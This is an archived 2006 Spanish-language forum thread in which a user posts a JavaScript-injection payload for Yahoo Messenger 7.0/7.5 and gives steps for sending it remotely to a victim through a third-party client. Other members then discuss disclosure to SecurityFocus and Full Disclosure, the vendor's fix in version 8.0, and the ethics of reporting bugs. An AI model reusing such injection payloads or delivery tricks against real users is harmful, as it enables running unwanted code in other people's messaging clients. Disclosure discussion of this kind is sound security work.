PDA

Ver la versión completa : Vulnerabilidad seria en yahoo messenger



Tcp_syn
28-07-2006, 13:14
Acabo de encontrar otra vulnerabilidad del yahoo messenger. Si ustedes ponen este codigo en un mensaje privado de yahoo messenger www.google.com es abierto por el internet explorer instantaneamente.


helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(


Obviamente es posible realizar esta vulnerabilidad en forma remota haciendo que la victima entre a la pagina que nosotros querramos. :-) Después les explico como.
Testeado en versiones 7.0/7.5

j8k6f4v9j
01-08-2006, 22:45
juas, qué bueno

¿La has sacado tú? O la has encontrado por ahí?

Salu2

Tcp_syn
02-08-2006, 10:38
La encontre yo, en serio tiene un monton de variaciones ya que es posible escribir javascript en un mensaje privado por ejemplo "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=alert('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=alert('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (sin comillas)Abre una ventana de advertencia con el mensaje Hola ó "helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=document.write('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=document.write('Hola')>helomsg:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (sin comillas) Escribe "hola" en la ventana del mensaje privado. Las opciones son infinitas.

Para hacerlo en forma remota tenemos que enviar un mensaje privado a la victima usando yahelite, enviandolo de la siguiente manera "s: helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg :+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(" (sin comillas) "helomsg :" aqui en vez de un espacio insertamos alt+0160 osea "s:[espacio]helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?(msg:---------------------------------------------<embed onload=window.open('http:\\\\google.com/')>helomsg[alt+0160]:+)-(%/?#()(=(/;_@#~$(@;+?/(?#@@*-)?@+#@;?("
Saludos.

j8k6f4v9j
02-08-2006, 12:44
Enhorabuena! y gracias por el aporte :)

Salu2

CrAcKzMe
02-08-2006, 15:41
Se lo has dicho a alguien más? Te has puesto ya en contacto con Yahoo?

Saludos y felicidades.

Tcp_syn
02-08-2006, 19:05
Si, se lo envíe a securityfocus y en el fulldisclosure de insecure http://www.securityfocus.com/bid/19211/ ó http://seclists.org/fulldisclosure/2006/Jul/0673.html yahoo por su parte bloqueó de su página principal la descarga de las versiones anteriores 7.0/7.5. Y reparó el bug en su versión 8.0.
Saludos

Cypress
02-08-2006, 21:18
todo bien, pero no me parece una buena idea hacer el trabajo de otros, y menos si ni siquiera te pagan, reconocen o te dan algun beneficio, sera que yahoo no me cae muy bien. creo que es eso, pero personalmete no me agrada la idea de informar de sus errores a ellos, por algo le pagan a programadores..., no se.
no creo que sea bienbenida mi idea, pero es lo que me parece
Saludos
Cypress

clarinetista
02-08-2006, 21:19
Si fuera por esa forma de pensar no existiria el software libre, ¿no crees?

Cypress
02-08-2006, 21:29
software libre es diferente a yahoo. de MICROSOFT

j8k6f4v9j
02-08-2006, 21:48
Cuando hablamos de libertad de conocimientos no nos estamos refiriendo a que se comparta la manera en que se explota un fallo sin publicar este fallo, ya sea yajú o gmail o lo que sea, hablamos de enseñar, publicar el código responsable de comportamiento de nuestras máquinas.

cypress, así es como se colabora realmente, como acaba de hacer Tcp_syn, no atacando sin sentido a corporaciones que nos caen mal, ¿nunca has pensado que quizá con tus campañas de supuesta concienciación est.ás alimentando al troll? O sea, ¿no crees que puedes ser tú quien hace publicidad gratuita a estas empresas que nada aportan al conocimiento en el terronode la informática?

Salu2

j8k6f4v9j
02-08-2006, 21:49
Además, esto es hacer trolling en un hilo dedicado a vulnerabilidades y ubicado en la sección correcta, tus opiniones y puntos de vista personales deberán ir en off-topic

Salu2

Tcp_syn
03-08-2006, 01:42
Cuando se descubrió la vulnerabilidad wmf los "programadores" de microsoft tardaron mas de 2 semanas en publicar el parche mientras que en otras páginas en muy poco tiempo publicaron parches no oficiales. La intencion de revelar un exploit es para que miles de entendidos en el tema puedan ayudar a la reparacion del mismo sin fines de lucro. Además a los "programadores" de microsoft les pagan de 100u$s a 500u$s por descubrir cada vulnerabilidad. ...si se publicara el codigo fuente de windows quiza le podamos dar una mano a microsoft...

Cypress
04-08-2006, 01:44
tengo que admitir cuando me he equivocado...
tienen razon.

morza2
04-08-2006, 02:01
TCP_SYN, no quiero desconfiar de ti, pero mira esto:
http://seclists.org/fulldisclosure/2006/Jul/0673.html
Excepto que te llames Ivan...fue otro el que lo descubrió

Tcp_syn
04-08-2006, 08:36
Si me llamo Iván enviame un mail si querés y te lo demuestro. :-)

morza2
05-08-2006, 09:27
Felicitaciones Ivan!!
Un orgullo tu descubrimiento.

salu2 :D